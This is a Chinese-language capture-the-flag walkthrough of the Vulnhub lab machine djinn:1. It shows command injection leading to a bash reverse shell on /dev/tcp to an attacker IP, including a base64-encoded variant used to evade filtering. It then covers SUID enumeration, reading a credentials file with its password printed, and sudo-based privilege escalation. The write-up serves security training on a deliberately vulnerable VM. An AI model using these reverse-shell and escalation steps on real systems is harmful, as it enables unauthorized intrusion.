djinn:1 Vulnhub Walkthrough

靶机下载链接:

https://download.vulnhub.com/djinn/djinn.ova

djinn:1 Vulnhub Walkthrough_第1张图片

 

主机端口扫描:

djinn:1 Vulnhub Walkthrough_第2张图片

 

FTP发现一些文件提示

djinn:1 Vulnhub Walkthrough_第3张图片

 

1337端口是一个游戏,去看下

djinn:1 Vulnhub Walkthrough_第4张图片

 

哈哈有点难,暂时放弃,看看7331HTTP server 这边有么有发现

使用dirb dirsearch 自带字典没有发现,加大字段枚举下目录

djinn:1 Vulnhub Walkthrough_第5张图片

 

djinn:1 Vulnhub Walkthrough_第6张图片

 

命令执行

反弹shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直弹不出来,猜测特殊字符做了过滤

base64 编码执行

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4yMDIuMTQyLzEyMzQgMD4mMQ== | base64 -d | bash

djinn:1 Vulnhub Walkthrough_第7张图片

 

接下来进行提权操作

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

内核:Linux djinn 4.15.0-66-generic

exp提权失败:https://www.exploit-db.com/download/47163

路径/home/nitish/.dev/creds.txt

nitish:p4ssw0rdStr3r0n9 密码

切换用户可能会提示:su: must be run from a terminal

执行此命令:/usr/bin/script -qc /bin/bash /dev/null

djinn:1 Vulnhub Walkthrough_第8张图片

 

djinn:1 Vulnhub Walkthrough_第9张图片

 

sudo - u sam genie -cmd new

djinn:1 Vulnhub Walkthrough_第10张图片

 

djinn:1 Vulnhub Walkthrough_第11张图片

 

OVER!!

你可能感兴趣的:(djinn:1 Vulnhub Walkthrough)